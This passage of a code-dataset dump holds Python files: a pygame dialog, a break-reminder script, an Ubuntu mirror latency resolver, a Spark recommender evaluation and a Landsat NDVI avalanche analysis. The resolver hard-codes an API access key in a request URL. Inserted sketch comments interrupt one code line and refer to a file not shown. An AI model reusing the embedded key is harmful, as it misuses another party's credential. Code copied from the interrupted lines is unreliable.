DialogInY + int(0.7 * DialogInLenY)\n if self.nBtn:\n btnLenX = min(int(1.5 * SquareDimen), max(SquareDimen, 30 * (len(self.nBtn) + 2)))\n self.nBtnRect = pygame.draw.rect(self.win, CHESS_WHITE, ((btnX, btnY), (btnLenX, btnLenY)),\n border_radius=15)\n 
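# [Illustrative sketch, not part of the original record] The ROI-building step in
# GLM_testing_loc.py above thresholds a resampled z-map, binarises it, and intersects
# it with an anatomical atlas mask. A minimal standalone version of that logic with
# synthetic NumPy arrays standing in for the nilearn images; the 2.3 threshold matches
# the surface plots above, everything else here is made up for demonstration.
import numpy as np

rng = np.random.default_rng(0)
z_map = rng.normal(size=(10, 10, 10))            # stand-in for the resampled contrast z-map
atlas_mask = np.zeros((10, 10, 10), dtype=bool)  # stand-in for the anatomical atlas
atlas_mask[3:7, 3:7, 3:7] = True

threshold = 2.3
functional_mask = z_map > threshold                 # voxels active in the contrast
roi = np.logical_and(functional_mask, atlas_mask)   # anatomically constrained localizer

print("suprathreshold voxels:", int(functional_mask.sum()))
print("voxels in constrained ROI:", int(roi.sum()))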
self.drawText(self.nBtn[0], 20, btnX + btnLenX // 2, btnY + btnLenY // 2, (0, 0, 0), centre=True)\n if self.pBtn:\n btnLenX = min(int(1.5 * SquareDimen), max(SquareDimen, 30 * (len(self.pBtn) + 2)))\n self.pBtnRect = pygame.draw.rect(self.win, CHESS_WHITE, ((btnX + DialogInLenX // 2, btnY),\n (btnLenX, btnLenY)), border_radius=15)\n self.drawText(self.pBtn[0], 20, btnX + DialogInLenX // 2 + btnLenX // 2, btnY + btnLenY // 2, (0, 0, 0),\n centre=True)\n pygame.display.update()\n\n def drawText(self, text, size, txtX, txtY, color, colorBg=None, font=gameFont, centre=False):\n Txt = pygame.font.Font(font, size).render(text, True, color, colorBg)\n nameRect = Txt.get_rect()\n if centre in [False, 'X', 'Y']:\n if centre == 'Y':\n txtX += nameRect.center[0]\n elif centre == 'X':\n txtY += nameRect.center[1]\n else:\n txtX += nameRect.center[0]\n txtY += nameRect.center[1]\n nameRect.center = (txtX, txtY)\n self.win.blit(Txt, nameRect)\n","sub_path":"Game/alertDialog.py","file_name":"alertDialog.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"5712374","text":"import webbrowser\nimport time\n\n\ntotal_breaks = 3\nbreak_count= 0\n\nwhile(break_count < total_breaks):\n\ttime.sleep(2*60*60)\n\twebbrowser.open(\"https://www.youtube.com/watch?v=StTqXEQ2l-Y\")\n\tbreak_count = break_count + 1\n\ttime.ctime()\n\tprint (\"This program started on \" + time.ctime())\n","sub_path":"take_a_break.py","file_name":"take_a_break.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"553753951","text":"import asyncio\r\nimport concurrent.futures\r\nimport requests\r\nimport json\r\nimport socket\r\nimport pycurl\r\nfrom urllib.parse import urlparse\r\nfrom haversine import haversine\r\nfrom io import BytesIO\r\n\r\n\r\ndef _ipToGeoloc(ipaddr):\r\n res = requests.get(\"http://api.ipstack.com/\"\\\r\n + ipaddr\\\r\n + \"?access_key=1e7beb7517ccc392c760dd63e3fa0917\")\r\n\r\n if res.status_code == 200:\r\n result = json.loads(res.text)\r\n return result['latitude'], result['longitude']\r\n else:\r\n raise Exception(res.status_code)\r\n\r\n\r\ndef _getMyGeoloc():\r\n return _ipToGeoloc('check')\r\n\r\n\r\ndef _urlToIp(url):\r\n o = urlparse(url)\r\n hostname = o.hostname\r\n port = o.port or (443 if o.scheme == 'https' else 80)\r\n ip_addr = socket.getaddrinfo(hostname, port)[0][4][0]\r\n return ip_addr\r\n\r\n\r\ndef getMirrorUrls(country='mirrors'):\r\n res = requests.get('http://mirrors.ubuntu.com/' + country + '.txt')\r\n\r\n if res.status_code == 200:\r\n return res.text.split(\"\\n\")\r\n else:\r\n raise Exception(res.status_code)\r\n \r\n\r\ndef getMirrorsWithLocation(sorted=True):\r\n mirrors = []\r\n \r\n for url in getMirrorUrls():\r\n try:\r\n ip_addr = _urlToIp(url)\r\n geoloc = _ipToGeoloc(ip_addr)\r\n mirrors.append((url, geoloc))\r\n except Exception as e:\r\n # current mirror is unreachable\r\n pass\r\n\r\n if sorted:\r\n myloc = _getMyGeoloc()\r\n mirrors.sort(key=lambda x: haversine(x[1], myloc))\r\n\r\n return mirrors\r\n\r\n\r\ndef getCandidates():\r\n mirrors = getMirrorsWithLocation()\r\n return [url for url, loc in mirrors]\r\n\r\n\r\ndef __getServerStat(url):\r\n c = pycurl.Curl()\r\n c.setopt(c.URL, url)\r\n c.setopt(c.WRITEDATA, BytesIO())\r\n c.setopt(c.TIMEOUT, 1)\r\n try:\r\n c.perform()\r\n stat = {\r\n \"time_namelookup\": c.getinfo(pycurl.NAMELOOKUP_TIME),\r\n \"time_connect\": 
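# [Illustrative sketch, not part of the original record] take_a_break.py above
# hard-codes three two-hour breaks; the same loop with the count, interval, and URL
# as parameters, a range() loop instead of the manual counter, and the timestamp
# printed when the break actually opens. Behaviour is otherwise unchanged.
import time
import webbrowser

def take_breaks(total_breaks=3, interval_seconds=2 * 60 * 60,
                url="https://www.youtube.com/watch?v=StTqXEQ2l-Y"):
    for break_number in range(1, total_breaks + 1):
        time.sleep(interval_seconds)
        webbrowser.open(url)
        print("Opened break %d at %s" % (break_number, time.ctime()))

# take_breaks(interval_seconds=5)  # uncomment with a short interval to test quickly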
c.getinfo(pycurl.CONNECT_TIME),\r\n \"time_appconnect\": c.getinfo(pycurl.APPCONNECT_TIME),\r\n \"time_pretransfer\": c.getinfo(pycurl.PRETRANSFER_TIME),\r\n \"time_redirect\": c.getinfo(pycurl.REDIRECT_TIME),\r\n \"time_starttransfer\": c.getinfo(pycurl.STARTTRANSFER_TIME),\r\n \"time_total\": c.getinfo(pycurl.TOTAL_TIME),\r\n \"speed_download\": c.getinfo(pycurl.SPEED_DOWNLOAD),\r\n \"speed_upload\": c.getinfo(pycurl.SPEED_UPLOAD),\r\n \"local_ip\": c.getinfo(pycurl.LOCAL_IP),\r\n \"local_port\": c.getinfo(pycurl.LOCAL_PORT)\r\n }\r\n except Exception as e:\r\n stat = {\r\n \"time_total\": 999999\r\n }\r\n c.close()\r\n\r\n return stat\r\n\r\n\r\nasync def __getAvgLatency(pool, url, trial=3):\r\n loop = asyncio.get_running_loop()\r\n times = await asyncio.gather(*[loop.run_in_executor(pool, lambda : __getServerStat(url)) for _ in range(trial)])\r\n return url, sum(map(lambda x: x['time_total'], times)) * 1000 // trial\r\n\r\n\r\nasync def _testLatencies(urls):\r\n loop = asyncio.get_running_loop()\r\n with concurrent.futures.ThreadPoolExecutor() as pool:\r\n wait_target = {__getAvgLatency(pool, url) for url in urls}\r\n done, pending = await asyncio.wait(wait_target) #, return_when=asyncio.FIRST_COMPLETED)\r\n for p in pending:\r\n p.cancel()\r\n\r\n responseTimes = list(map(lambda x: x.result(), done))\r\n responseTimes.sort(key=lambda x: x[1])\r\n return responseTimes\r\n\r\n\r\ndef testLatencies(urls):\r\n return asyncio.run(_testLatencies(urls))\r\n\r\n\r\ndef findOptimalMirror(urls):\r\n latencies = testLatencies(urls)\r\n return latencies[0][0]","sub_path":"eapt/resolver.py","file_name":"resolver.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"204065265","text":"from zoo.pipeline.api.keras.layers import *\nfrom zoo.models.recommendation import UserItemFeature\nfrom zoo.models.recommendation import NeuralCF\nfrom zoo.common.nncontext import init_nncontext\nimport matplotlib\nfrom sklearn import metrics\nfrom operator import itemgetter\nfrom bigdl.dataset import movielens\nfrom bigdl.util.common import *\nimport random\nimport pickle\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, udf, array, broadcast, log, explode, struct, collect_list\n\nsc = init_nncontext(\"NCF evaluation\")\nspark = SparkSession.builder \\\n .master(\"local[1]\") \\\n .appName(\"SparkByExamples.com\") \\\n .getOrCreate()\n\nmovielens_data = movielens.get_id_ratings(\"./data/movielens/\")\n\nrate_file = \"./data/movielens/ml-1m/ratings.dat\"\nratings = []\nwith open(rate_file) as infile:\n for cnt, line in enumerate(infile):\n x = line.strip().split(\"::\")\n y = list(map(lambda item: int(item), x))\n # y[3] = datetime.datetime.fromtimestamp(y[3])\n ratings.append(y)\n\nmin_user_id = np.min(movielens_data[:,0])\nmax_user_id = np.max(movielens_data[:,0])\nmin_movie_id = np.min(movielens_data[:,1])\nmax_movie_id = np.max(movielens_data[:,1])\nrating_labels= np.unique(movielens_data[:,2])\n\n# open a file, where you ant to store the data\nwith open(\"./data/movielens/train.pickle\", \"rb\") as f:\n train_data = pickle.load(f)\nwith open(\"./data/movielens/test.pickle\", \"rb\") as f:\n test_data = pickle.load(f)\n\nprint(min_user_id, max_user_id, min_movie_id, max_movie_id, rating_labels)\n\ndef build_sample(user_id, item_id, rating):\n sample = Sample.from_ndarray(np.array([user_id, item_id]), np.array([rating]))\n return UserItemFeature(user_id, item_id, 
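# [Illustrative sketch, not part of the original record] resolver.py above measures
# per-mirror latency with pycurl inside an asyncio/thread-pool pipeline. The core
# idea -- time each URL a few times in parallel and sort by mean latency -- in a
# simpler form using only requests and concurrent.futures; the large-penalty value
# for unreachable mirrors mirrors the 999999 sentinel used above.
import concurrent.futures
import time
import requests

def avg_latency_ms(url, trials=3, timeout=1):
    total = 0.0
    for _ in range(trials):
        start = time.monotonic()
        try:
            requests.head(url, timeout=timeout)
            total += time.monotonic() - start
        except requests.RequestException:
            total += 999.0  # unreachable mirror: large penalty, as above
    return url, total * 1000 / trials  # mean latency in milliseconds

def rank_mirrors(urls):
    with concurrent.futures.ThreadPoolExecutor() as pool:
        results = list(pool.map(avg_latency_ms, urls))
    return sorted(results, key=lambda pair: pair[1])  # fastest mirror first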
sample)\n\ntrainPairFeatureRdds = sc.parallelize(train_data)\\\n .map(lambda x: build_sample(x[0], x[1], x[2]))\nvalPairFeatureRdds = sc.parallelize(test_data) \\\n .map(lambda x: build_sample(x[0], x[1], x[2]))\nvalPairFeatureRdds.cache()\n\ntrain_rdd= trainPairFeatureRdds.map(lambda pair_feature: pair_feature.sample)\nval_rdd= valPairFeatureRdds.map(lambda pair_feature: pair_feature.sample)\nval_rdd.persist()\n\nncf = NeuralCF(user_count=max_user_id,\n item_count=max_movie_id,\n class_num=5,\n hidden_layers=[20, 10],\n include_mf = False)\n\nncf.compile(optimizer= \"adam\",\n loss= \"sparse_categorical_crossentropy\",\n metrics=['accuracy'])\n\nloaded = ncf.load_model(\"./save_model/movie_ncf1.zoomodel\") #old\n\npredictions = ncf.predict_classes(val_rdd).collect()\n#print(predictions[1:10000])\n\nrecommendations = ncf.recommend_for_user(valPairFeatureRdds, 10)\n#for rec in recommendations.take(5): print(rec)\nuser_items_rec10 = recommendations.map(lambda x: [x.user_id, x.item_id]).collect()\nimport pandas\n\nrec_df = pandas.DataFrame(user_items_rec10, columns = ['uid', 'mid'])\nrec_df = rec_df.groupby('uid', as_index=False).agg(lambda x: list(x))\nprint(\"length:\")\nprint(len(rec_df))\n\ntest_df = pandas.DataFrame(test_data, columns=['uid', 'mid', 'rate', 'timestamp'])\ntest_df['rate'] = test_df['rate'] + 1\ntest_df['Rank'] = test_df.groupby('uid', as_index=False)['rate'].transform(lambda x: x.rank(ascending=False, method=\"first\"))\ntest_df = test_df[test_df['Rank'] < 11]\n#print(test_df.head(100))\ntest_df = test_df[['uid', 'mid']]\ntest_df = test_df.groupby('uid', as_index=False).agg(lambda x: list(x))\n\nprint(\"length:\")\nprint(len(test_df))\n\nrec_df = spark.createDataFrame(rec_df)\nrec_df.show(10)\n\ntest_df = spark.createDataFrame(test_df)\ntest_df.show(10)\n\njoined = rec_df.withColumnRenamed('mid', 'midrec').join(test_df, on=['uid'])\njoined.show(10)\n\ndef precision(prediction, groundtruth):\n sum = 0.0\n for ele in prediction:\n if ele in groundtruth:\n sum = sum + 1\n return sum/(len(prediction))\n\nprecision_udf = udf(lambda c1, c2: precision(c1, c2))\n\njoined=joined.withColumn(\"precision\", precision_udf('midrec', 'mid'))\n#def precision():\njoined.show(10, False)\nfrom pyspark.sql.functions import mean as _mean\n\nstats = joined.select(_mean(col('precision')).alias('mean')).collect()\nmean = stats[0]['mean']\nprint(\"precision @ k:\", mean)\n","sub_path":"src/bigdlmodels/evaluate_ncf.py","file_name":"evaluate_ncf.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"586839918","text":"# Import packages and set working directory if needed here\nimport datetime\nimport glob\nimport os\n\nimport tempfile\n\nimport earthpy.spatial as es\nimport geopandas as gpds\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport numpy.ma as ma\nimport pandas as pd\nfrom pyproj import Proj, transform\nfrom rasterio import mask\nfrom rasterio.transform import from_origin\nimport rasterio as rio\nimport rasterio.plot\nimport rasterstats as rs\nimport tarfile\nimport warnings; \nwarnings.simplefilter('ignore')\n\nimport common_functions as common\n\nlandsat_file_root = os.path.join(common.original_raster_data, 'landsat_summer')\nlandsat_raw_data = os.path.join(common.original_raster_data, 'landsat_raw')\ndata_year_list = ['2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016', '2017', '2018']\n\navalanche_overlap_shape = None\n\n# This should match the qa 
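# [Illustrative sketch, not part of the original record] The Spark precision UDF
# above computes, per user, the share of the top-10 recommended items that also
# appear in that user's top-10 ground-truth items. The same metric in plain Python
# (the names and example values here are illustrative only):
def precision_at_k(recommended, relevant, k=10):
    top_k = recommended[:k]
    relevant_set = set(relevant)
    hits = sum(1 for item in top_k if item in relevant_set)
    return hits / len(top_k)

# 3 of the 5 recommended items are relevant -> precision 0.6
print(precision_at_k([1, 2, 3, 4, 5], [2, 3, 5, 9], k=5))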
layer\nqa_match = 'pixel_qa'\n\n# Set an elevation threshold, in meters, to limit our elevation for our dNDVI analysis\nminimum_elevation_threshold = 1000\nmaximum_elevation_threshold = 3000\n\nrunning_max_dndvi = None\n\n# The order which we will be concatenating our tifs\ncolor_order = ['red', 'green', 'blue', 'nir']\n\nndvi_by_year = {}\n\nmean_below_thresh = pd.DataFrame(columns=[\"year\", \n \"mean_ndvi_in_slide\", \n \"mean_ndvi_out_of_slide\", \n \"mean_dndvi_in_slide\", \n \"mean_dndvi_out_of_slide\", \n \"snow_depth\"])\n \nfile_list = glob.glob(os.path.join(landsat_file_root, \"L*\"))\ntotal_array_count = 0\nrunning_ndvi_sum_array = None\nonly_analyze_version_number = None\navalanches_only = None\n\nband_colors_landsat_versions = {\n '7':{ \n 'blue':'band1',\n 'green':'band2',\n 'red':'band3',\n 'nir':'band4'\n },\n '8':{ \n 'blue':'band2',\n 'green':'band3',\n 'red':'band4',\n 'nir':'band5'\n }\n }\n\ndef open_and_crop_geotiff(geotiff_path, out_path, crop_by):\n \"\"\"\n Open geotiff and crop to the extent of the crop_by geodataframe\n \n Parameters\n ----------\n geotiff_path: string\n Path of the input geotiff to be cropped\n out_path: string\n Target path to write the output to\n crop_by: pandas geodataframe\n Geodataframe or shape to crop by \n \"\"\"\n with rio.open(geotiff_path) as src:\n # Reproject our shape to whatever projection the landsat data is in\n src_meta = src.meta.copy()\n crop_by_reprojected = crop_by.to_crs(src.crs)\n band_masked, transform_cropped = mask.mask(src, crop_by_reprojected.geometry, crop=True)\n src_meta['transform'] = transform_cropped\n print(transform_cropped)\n src_meta['width'] = band_masked.shape[2]\n src_meta['height'] = band_masked.shape[1]\n with rasterio.open(out_path, 'w', **src_meta) as dst:\n dst.write(band_masked) \n \n\ndef create_archive_from_tgz(zipped_data_dir, target_data_dir):\n \"\"\"\n Unzip the tgz files that are in the zipped_data_folder and move them to the\n target_dir only if they don't already exist in the target_dir.\n \n Parameters\n ----------\n zipped_data_dir: string\n Source directory\n target_dir: string\n Target directory\n \"\"\"\n file_list = glob.glob(os.path.join(zipped_data_dir, \"*.tar.gz\"))\n print(\"Number of files found: %d\" % len(file_list))\n files_in_data_dir = [os.path.basename(base_name) for base_name in glob.glob(os.path.join(target_data_dir, \"*\"))]\n print(\"Number of files already present: %d\" % len(files_in_data_dir))\n files_to_upload = [file_to_unzip \n for file_to_unzip \n in file_list \n if os.path.basename(file_to_unzip.replace(\".tar.gz\", \"\"))\n not in files_in_data_dir] \n print(\"Number of files to upload: %d\" % len(files_to_upload))\n for file_name in files_to_upload:\n with tempfile.TemporaryDirectory() as temporary_directory:\n scene_name = unzip_file(file_name, target_data_dir=temporary_directory) \n band_list = glob.glob(os.path.join(temporary_directory, scene_name, \"*.tif\"))\n landsat_version = landsat_path_to_version(scene_name)\n bands_to_save = [i for i in band_colors_landsat_versions[landsat_version].values()] + [\"qa\"]\n band_list = [fname \n for fname in band_list \n for bands_to_save_match in bands_to_save \n if bands_to_save_match in fname]\n scene_directory = os.path.join(target_data_dir, scene_name)\n os.mkdir(scene_directory)\n for band in band_list:\n band_basename = os.path.basename(band)\n open_and_crop_geotiff(band, os.path.join(scene_directory, band_basename), common.study_area_box_gdf)\n \ndef unzip_file(file_name, target_data_dir=\"./\"): \n \"\"\"\n 
Unzip all tgz files in file_list and save to target_data_dir. Each file will\n be saved into its own directory, named the same as the .tgz name, without\n the extension.\n \n Parameters\n ----------\n file_name: string\n Path of the file to unzip\n target_data_dir: str\n Directory to put the files into\n \"\"\"\n tar = tarfile.open(file_name, \"r:gz\")\n file_base_no_ext = os.path.basename(file_name.replace(\".tar.gz\", \"\"))\n directory_name = os.path.join(target_data_dir, file_base_no_ext)\n tar.extractall(path=directory_name)\n tar.close()\n return file_base_no_ext\n\n\ndef mask_clouds(qa_arr, landsat_ver=\"8\"):\n \"\"\"\n Creates a cloud mask given a qa_raster.\n \n Parameters\n ----------\n qa_arr: ndarray\n A qa raster containing information about cloud cover.\n landsat_ver: str\n A string representation of the landsat version.\n \n Returns\n ----------\n cloud_mask: ndarray\n A boolean array the same shape as qa_raster containing \n True values where clouds are present and False values \n where there are no clouds.\n \"\"\" \n if landsat_ver == \"8\":\n # Much of the terrain was being marked as cloud with the cloud_shadow and cloud \n # mask values, so had to only mask high confidence clouds.\n cloud_shadow = []#[328, 392, 840, 904, 1350]\n cloud = []#[352, 368, 416, 432, 480, 864, 880, 928, 944, 992]\n high_confidence_cloud = [480, 992]\n high_confidence_cirrus = [834, 836, 840, 848, 864, 880, 898, 900, 904, 912, 928, 944, 992]\n snow_ice = [336, 368, 400, 432, 848, 880, 912, 944, 1352]\n water = [324, 388, 836, 900, 1348]\n combined_list = list(set(cloud_shadow + \n cloud + \n high_confidence_cloud + \n high_confidence_cirrus + \n snow_ice + \n water))\n elif landsat_ver == \"7\":\n # Much of the terrain was being marked as cloud with the cloud_shadow and cloud \n # mask values, so had to only mask high confidence clouds.\n cloud_shadow = []#[72, 136]\n cloud = [] #[96, 112, 160, 176, 224]\n low_confidence_cloud = [] #[66, 68, 72, 80, 96, 112]\n medium_confidence_cloud = [] #[130, 132, 136, 144, 160, 176]\n high_confidence_cloud = [224]\n snow_ice = [80, 112, 144, 176]\n water = [68, 132]\n combined_list = list(set(cloud_shadow + \n cloud + \n low_confidence_cloud + \n medium_confidence_cloud + \n high_confidence_cloud + \n snow_ice + \n water))\n else:\n print(\"Landsat version %s not recognized. No cloud removal performed.\" % landsat_ver)\n combined_list = []\n # Create a mask with True values indicating non-cloud pixels\n all_masked_values = np.array(combined_list)\n cloud_mask = np.isin(qa_arr, all_masked_values)\n \n return cloud_mask\n\n\ndef files_from_pattern(pattern, expect_single_file=False):\n \"\"\"\n From a given pattern, retrieve the filenames. If expect_single_file is True,\n raise an error if multiple files are returned. If no files are returned, print\n a message.\n \n TODO: expand pattern to regex instead of only wildcards.\n \n Parameters\n ----------\n pattern: str\n A pattern to match filename. 
At this time, only wildcards are accepted (no regular\n expressions).\n expect_single_file: bool\n When True, a valueError is raised if more than one file is returned.\n \n Returns\n ----------\n [file names]: list\n A list of returned file names.\n \"\"\"\n returned_files = glob.glob(pattern)\n if len(returned_files) == 0:\n print(\"No files found for pattern %s.\" % pattern)\n if expect_single_file and len(returned_files) > 1:\n raise ValueError(\"Expecting a single value to be returned \"\n \"and found %d values for pattern %s.\" \n % (len(returned_files), pattern))\n return returned_files\n\ndef scene_path_to_year(path):\n \"\"\"\n Determine the year given a scene ID\n \n Parameters\n ----------\n path: string\n Landsat scene ID (see https://landsat.usgs.gov/landsat-collections#Prod%20IDs)\n \n Returns\n ----------\n [year]: string\n Landsat year\n \"\"\"\n return os.path.basename(path)[10:14]\n\ndef landsat_path_to_version(path):\n \"\"\"\n Determine the landsat version given a scene ID\n \n Parameters\n ----------\n path: string\n Landsat scene ID (see https://landsat.usgs.gov/landsat-collections#Prod%20IDs)\n \n Returns\n ----------\n [year]: string\n Landsat version (single digit string)\n \"\"\"\n return os.path.basename(path)[3:4]\n\n\ndef generate_ndvi():\n ndvi_df = pd.DataFrame()\n\n # Loop through each year in the outer loop\n for year in data_year_list: \n print(\"Analyzing year %s\" % year)\n year_list_subset = [file for file in file_list if scene_path_to_year(file) == year]\n if not year_list_subset:\n print(\"No files found for year %s\" % (year))\n continue\n accumulated_ndvi_arrays = []\n \n # Loop through each file for the specified year in the inner loop\n for file in year_list_subset:\n file_basename = os.path.basename(file)\n landsat_version_number = landsat_path_to_version(file_basename)\n \n # If this landsat version number is not to be analyzed, continue to the next iteration\n if only_analyze_version_number is not None and only_analyze_version_number == landsat_version_number:\n continue\n band_colors = band_colors_landsat_versions[landsat_version_number] \n accumulated_bands_list = []\n accumulated_bands_list_unmasked = [] \n\n # Get QA layer to create our cloud mask\n qa_file_name = files_from_pattern(os.path.join(file, \"*%s*\" % qa_match), \n expect_single_file=True)[0]\n\n with rio.open(qa_file_name) as src:\n \n # Reproject our shape to whatever projection the landsat data is in\n landsat_crs = src.crs\n landsat_affine = src.transform\n qa_arr = src.read()\n qa_arr = np.squeeze(qa_arr)\n cloud_mask = mask_clouds(qa_arr, landsat_ver=landsat_version_number)\n\n # Loop through the colors necessary to create NDVI\n for color in color_order:\n band_file_name = files_from_pattern(os.path.join(file, \"*%s*\" % band_colors[color]), \n expect_single_file=True)[0]\n with rio.open(band_file_name) as src:\n \n # Reproject our shape to whatever projection the landsat data is in\n band = src.read()\n\n # Cast to float so we can assign nan values\n band = np.squeeze(band).astype(\"float\")\n \n # Mask invalid values\n band[band == src.nodatavals] = False\n \n # Remove the banding effect due to sattelite malfunction with landsat 7 after 2003\n if landsat_version_number == 7 and int(year) > 2003:\n band[band == 0] = False\n \n # Mask clouds \n band[cloud_mask] = False\n \n accumulated_bands_list.append(band) \n \n # Create arrays from our cloud-masked and no-cloud-masked band lists\n accumulated_bands_arr = np.array(accumulated_bands_list)\n\n # Calculate the NDVI array 
and append to list\n ndvi_arr = common.calculate_NDVI(accumulated_bands_arr)\n ndvi_df = ndvi_df.append({\"year\": year, \n \"fname\": file_basename, \n \"RGB_arr\": accumulated_bands_arr, \n \"NDVI_arr\": ndvi_arr, \n \"landsat_ver\": landsat_version_number,\n \"valid_vals\": band[band != False].size\n }, \n ignore_index=True)\n\n # Metadata with pandas is unfortunate; would move to something that handles metadata more robustly like xarray\n # but there's additional overhead/complexity with that. Don't copy this dataframe otherwise this metadata will\n # disappear in the copy.\n ndvi_df.affine = landsat_affine\n ndvi_df.crs = landsat_crs\n\n return ndvi_df\n\n\ndef generate_dndvi(ndvi_df, avalanche_overlap_shape):\n shapefile_below_threshold = avalanche_overlap_shape[\n (avalanche_overlap_shape['height_bucket'] < maximum_elevation_threshold) & \n (avalanche_overlap_shape['height_bucket'] > minimum_elevation_threshold)]\n\n mean_below_thresh = pd.DataFrame()\n\n ndvi_year = ndvi_df.groupby(by=\"year\")\n for year, group in ndvi_year:\n ndvi_vals = np.array(group['NDVI_arr'].values.tolist())\n annual_ndvi_array = np.nanmax(ndvi_vals, axis=0)\n ndvi_below_elevation_thresh = common.rasterstats_grouped_by_height(shapefile_below_threshold, \n annual_ndvi_array, \n ndvi_df.affine, \n \"mean\")\n mean_below_thresh = mean_below_thresh.append(\n {\n \"year\": year,\n \"mean_NDVI_in_slide\": ndvi_below_elevation_thresh\n .replace([np.inf, -np.inf], np.nan)['mean_avalanche']\n .mean(), \n \"mean_NDVI_out_of_slide\": ndvi_below_elevation_thresh\n .replace([np.inf, -np.inf], np.nan)['mean_no_avalanche']\n .mean(), \n \"snow_depth\": common.snowfall_data_df\n .loc[common.snowfall_data_df['Year'] == int(year), \"Total\"]\n .iat[0]\n },\n ignore_index=True\n )\n mean_below_thresh['mean_dNDVI_in_slide'] = mean_below_thresh['mean_NDVI_in_slide'].diff()\n mean_below_thresh['mean_dNDVI_out_of_slide'] = mean_below_thresh['mean_NDVI_out_of_slide'].diff()\n \n return mean_below_thresh\n\ndef generate_avalanche_shapes(ndvi_crs):\n # Generate a single shapefile that contains the union of the\n # avalanche path and the elevation buckets for our entire study area\n # This step takes forever when you run it for the first \n # time and if the geojson isn't available on disk\n return common.generate_unioned_avalanche_overlay(ndvi_crs)\n\n\ndef ndvi_analysis(ndvi_df, avalanche_overlap_shape):\n # The rgb image that has the most valid values to be used as the background for plotting\n best_rgb = ndvi_df.loc[ndvi_df['valid_vals'].idxmax()]['RGB_arr']\n\n # Create a 3-d array and take the mean over the 0th dimension (time)\n ndvi_vals = np.array(ndvi_df['NDVI_arr'].values.tolist())\n mean_ndvi_array = np.nanmax(ndvi_vals, axis=0)\n \n # This is the stat we are using in our zonal stats - taking the spatial mean\n stat = \"mean\"\n slide_paths_elev_buckets = avalanche_overlap_shape[~(pd.isna(avalanche_overlap_shape['avalanche_id']))]\n ndvi_slide_paths = common.get_zonal_stats_dataframe(slide_paths_elev_buckets, \n mean_ndvi_array, \n ndvi_df.affine, \n stat)\n _, _ = common.plot_rgb_and_vector(best_rgb, \n ndvi_df.crs,\n ndvi_slide_paths,\n \"Maximum NDVI in Slide Path Height Intervals\\n(Landsat Fig. 
1)\", \n \"Imagery: Landsat, 2008-2018, \" + \\\n \"Avalanche Shapes: Utah Automated Geographic Reference Center\",\n vmax=1,\n vmin=-1,\n color=stat)\n\n # Find the deviation from the slide path NDVI and the remainder of the height bin\n # plot the result with a colormap\n ndvi_elevation_buckets = common.rasterstats_grouped_by_height(avalanche_overlap_shape, \n mean_ndvi_array, \n ndvi_df.affine, \n stat)\n slide_paths_elev_buckets[\"NDVI_deviation\"] = np.nan\n\n # Loop through the different elevation buckets\n for _, row in ndvi_elevation_buckets.iterrows():\n\n # Isolate just the slide paths in this elevation bucket\n is_in_height_bucket = slide_paths_elev_buckets['height_bucket'] == row['height_bucket']\n\n # Subtract the mean no-avalanche NDVI from the equivalent elevation bucket within the slide paths \n slide_paths_elev_buckets.loc[is_in_height_bucket, \"NDVI_deviation\"] = \\\n ndvi_slide_paths[stat] - row[stat + '_no_avalanche']\n\n _, _ = common.plot_rgb_and_vector(best_rgb, \n ndvi_df.crs,\n slide_paths_elev_buckets,\n \"Deviation From Typical Elevation NDVI\\n(Landsat Fig. 2)\", \n \"Imagery: Landsat Avalanche Shapes: Utah Automated Geographic Reference Center\",\n vmax=.25,\n vmin=-.25,\n color=\"NDVI_deviation\")\n\n common.plot_bar(ndvi_elevation_buckets[ndvi_elevation_buckets['height_bucket'] != 0], \n \"height_bucket\", \n \"Elevation (meters)\", \n ['mean_avalanche', 'mean_no_avalanche'], \n \"NDVI\", \n \"Maximum NDVI in Avalanche-Prone Areas vs Low Avalanche-Risk Areas\\n\" + \\\n \"maximum of %d Landsat datasets\\n\" % len(ndvi_df) + \\\n \"(Landsat Fig. 3)\", \n \"Landsat, 2008-2018\",\n series_names=['Within Avalanche Paths', \n 'Outside Avalanche Paths'])\n\n\ndef dndvi_analysis(dndvi_df_below_altitude_thresh):\n # First row is na since we don't have a previous NDVI to compare it to. Drop this.\n dndvi_df_below_altitude_thresh_no_na = dndvi_df_below_altitude_thresh.dropna(axis=0)\n dndvi_df_below_altitude_thresh_no_na.set_index(\"year\")\n ax1 = common.plot_bar(dndvi_df_below_altitude_thresh_no_na, \n 'year', \n 'Year', \n ['mean_dNDVI_in_slide','mean_dNDVI_out_of_slide'], \n \"Mean dNDVI Between Years\\n(positive indicates growth)\", \n \"dNDVI Below %s Meters and above %s Meters vs Snowfall\\n(Landsat Fig. 5)\"\n % (maximum_elevation_threshold, minimum_elevation_threshold), \n \"Imagery Data: Landsat 2008-2018\\n\" + \\\n \"Snowfall Data: Utah Department of Transportation\\n\" + \\\n \"Avalanche information: Utah Automated Geographic Reference Center\", \n series_names=[\"Annual dNDVI In Slide Paths\", \"Annual dNDVI Outside Slide Paths\"],\n display_plot=False)\n ax2 = ax1.twinx()\n dndvi_df_below_altitude_thresh_no_na['snow_depth'].plot(x='year', ax=ax2)\n ax2.set_ylabel('Total Snowfall in Prior Winter (inches)', fontsize=22)\n plt.show()\n\n\ndef calculate_maximum_diff(ndvi_df):\n # Get absolute max dNDVI for each pixel in our study period\n combined_arr = np.array(ndvi_df['NDVI_arr'].values.tolist())\n absolute_max_diff_ndvi = np.nanmax(combined_arr, axis=0) - np.nanmin(combined_arr, axis=0)\n _ = common.plot_array_and_vector(absolute_max_diff_ndvi, \n ndvi_df.crs,\n common.avalanche_shapes_object,\n \"Maximum Absolute Difference in NDVI, 2008-2018\\n(Landsat Fig. 
